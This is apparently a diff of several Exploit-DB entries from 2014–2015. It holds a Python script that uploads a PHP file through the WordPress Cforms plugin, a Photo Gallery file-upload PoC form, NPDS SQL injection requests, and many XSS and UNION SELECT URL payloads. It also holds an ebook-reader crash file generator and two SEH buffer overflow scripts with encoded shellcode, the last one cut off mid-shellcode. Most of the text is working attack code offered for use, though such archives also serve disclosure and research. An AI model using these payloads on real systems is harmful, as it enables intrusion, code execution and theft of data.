n = str(x)
break
print 'Cforms form number is <'+n+'>'
hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n]
fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)]
required = {'sendbutton'+n:'1'}
for f in fields:
for node in tree.xpath('//*[@id="' + f + '"]'):
if node is not None:
if 'fldrequired' in node.get('class'):
if 'fldemail' in node.get('class'):
required[f] = text_mail
else:
required[f] = text
for h in hidden:
for node in tree.xpath('//*[@id="' + h + '"]'):
if node is not None:
required[h] = node.get('value')
for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'):
if node is not None:
print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
return 0
files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename))}
r = s.post(url,data=required,files=files)
if r.status_code != requests.codes.ok:
print 'Error: post error.'
print r.status_code
return 0
else:
url1 = url + home + 'noid-wow.php'
flag = 0
if s.get(url1).status_code != requests.codes.ok:
for l in xrange(1,int(b)):
url1 = url + home + str(l) + '-wow.php'
print url1
if s.get(url1).status_code == requests.codes.ok:
flag = 1
break
else:
flag = 1
if flag == 1:
print "Succes! Uploaded file: " + url1
else:
print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"
main()

34
platforms/php/webapps/35916.txt Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps
1. Description
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php
http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register).
Pack .php files into .zip archive then send it using:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
<input type="file" name="files">
<input type="submit" value="Hack!">
</form>
Your files will be visible inside:
http://wordpress-install/wp-admin/rce/
3. Solution:
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip

127
platforms/php/webapps/35950.txt Executable file
View file

@ -0,0 +1,127 @@
Title - NPDS CMS Revolution-13 - SQL Injection Vulnerability
Credits & Author:
Narendra Bhati ( R00t Sh3ll )
www.websecgeeks.com
References (Source):
====================
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/
Release Date:
=============
24-01-2015
CVE ID :
====================================
CVE-2015-1400
Product & Service Introduction:
===============================
http://www.npds.org/
Abstract Advisory Information:
==============================
Narendra Bhati ( R00t Sh3ll ) An Information Security Analyst In Pune ( India ) discovered a remote sql injection vulnerability in the NPDS CMS .
Vulnerability Disclosure Timeline:
==================================
25-01-2015 : Public Disclosure
Timeline Status:
=================
Reported To Vendor 14-12-2014
Verified By Vendor 15-12-2014
Acknowledge By Vendor 14-01-2015
Public Disclosure By Vendor 24-01-2015
Technical Disclosure 25-01-2015
Vendor Security Advisory http://www.npds.org/viewtopic.php?topic=26233&forum=12
Technical Disclosure - http://websecgeeks.com/npds-cms-sql-injection/
CVE-2015-1400
Mitigation For This Vulnerability There Is No Update By Vendor , But That Will Be Out Soon !
Affected Product(s):
====================
NPDS-Revolution-13
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A sql injection web vulnerability has been discovered in the NPDS CMS - NPDS-Revolution-13.
The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms.
The sql injection vulnerability is located in the `query` parameter of the vulnerable `search.php ` application file. Remote attackers
are able to inject own sql commands by usage of vulnerable `search.php ` file. A successful attack requires to
manipulate a POST method request with vulnerable parameter `query` value to inject own sql commands. The injection is a time based ( tested ) by sql injection
that allows to compromise the web-application and connected dbms.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] NPDS-Revolution-13
Vulnerable File(s):
[+] search.php
Vulnerable Parameter(s):
[+] query
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account.
For reproduce the security vulnerability follow the provided information and steps below to continue.
HTTP Request
##### ==========
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: cookievalue
Connection: keep-alive
content-type:! application/x-www-form-urlencoded
Content-Length: 63
query=")and benchmark(20000000,sha1(1))-
====================================
Reference(s):
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerability `query` parameter value in the search.php file.
Use a prepared statement to fix the issues fully and setup own exception that prevents sql injection attacks.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability as critical
Credits & Author:
==================
Narendra Bhati ( R00t Sh3ll )
www.websecgeeks.com

7
platforms/php/webapps/35975.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48814/info
Cyberoam UTM is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?srcip=<script>alert(document.cookie)</script>

7
platforms/php/webapps/35976.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48835/info
Synergy Software is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/courses.php?id=-1 union select null,user_loginname_vc,null,null,null,user_pass_vc,null,null,null,null from user_m

7
platforms/php/webapps/35977.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48872/info
Godly Forums is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Forum/topics.php?id=2

15
platforms/php/webapps/35978.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/48875/info
Online Grades is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Grades 3.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/admin/admin.php?func=1"><script>alert(1)</script>&skin=classic
http://www.example.com/admin/admin.php?func=0&skin=1"><script>alert(1)</script>
http://www.example.com/admin/admin.php?func=0&todo=1"><script>alert(1)</script>
http://www.example.com/admin/admin.php?func=0&what=1"><script>alert(1)</script>&who=Faculty
http://www.example.com/admin/admin.php?func=0&what=mail&who=1"><script>alert(1)</script>
http://www.example.com/admin/admin.php/>"><script>alert(1)</script>

7
platforms/php/webapps/35979.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48878/info
Willscript Recipes website Script Silver Edition is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/new_recipes/recipes/viewRecipe.php?recipeId=44

9
platforms/php/webapps/35984.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48883/info
The 'com_virtualmoney' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Virtual Money 1.5 is affected; other versions may also be vulnerable.
www.example.com/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT]

9
platforms/php/webapps/35985.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/report_marketing.php?mode=report&exc[0]=1'

9
platforms/php/webapps/35986.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())

9
platforms/php/webapps/35987.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/search.php?search_string=1' union select 1,version()

9
platforms/php/webapps/35988.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/tasks.php?selected[]=1'&action=markcomplete

9
platforms/php/webapps/35989.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48902/info
MBoard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
MBoard 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/go.php?url=http://example.com

39
platforms/php/webapps/35990.txt Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/48905/info
PHPJunkYard GBook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHPJunkYard GBook 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://www.example.com/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://www.example.com/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?from=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?email=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?added=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_tasks.php?task_description=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
http://www.example.com/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://www.example.com/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://www.example.com/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/emoticons_popup.php?list_emoticons=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
http://www.example.com/templates/default/error.php?myproblem=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/error.php?backlink=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/overall_footer.php?settings[pages_top]=%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[target]=%22%3E%3Cscrip t%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[tpl_path]=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/overall_header.php?settings[gbook_title]=%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
http://www.example.com/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%28document.cook

96
platforms/windows/dos/35889.py Executable file
View file

@ -0,0 +1,96 @@
# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]
#Technical Details & Description:
#================================
#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).
#Piece of Code
#========================================================================
#!/usr/bin/python
buffer = "A"*1000
filename = "crash"+".mobi" # For testing with .prc, change the extension
file = open(filename, 'w')
file.write(buffer)
file.close()
print "File Successfully Created [1]"
#========================================================================
#Debugging and Error Log
#========================
#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path. *
#* Use .symfix to have the debugger choose a symbol path. *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is:
#ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#7c901230 cc int 3
#0:003> g
#ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0
#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll -
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=????????
#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption
#Solution - Fix & Patch:
#=======================
#Restrict working maximum size & set a own exception-handling for over-sized requests.
#Author:
#=======
#Kapil Soni (Haxinos)

71
platforms/windows/local/35812.py Executable file
View file

@ -0,0 +1,71 @@
#!/usr/bin/python
# coding: utf-8
#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow
#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
#Video poc:http://bit.ly/17DhwSR
print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
from struct import pack
junk="\x41" * 18073
nseh="\xeb\x06\x90\x90"
seh=pack('<I',0x6900CEAE)#6900CEAE 5F POP EDI intl.dll
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
header = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n'
footer = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a"
exploit = header + footer
filename = "UpdateCfg.ini"
file = open(filename , "w")
file.write(exploit)
file.close()

69
platforms/windows/local/35813.py Executable file
View file

@ -0,0 +1,69 @@
#!/usr/bin/python
#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow
#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
#Version:14.0.0.162
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Windows 7 En
print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n"
from struct import pack
buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44"
buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53"
buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e"
buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a"
junk="\x41" * 18164
nseh="\xeb\x06\x90\x90"
seh=pack('<I',0x7C3A1868)#7C3A1868
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
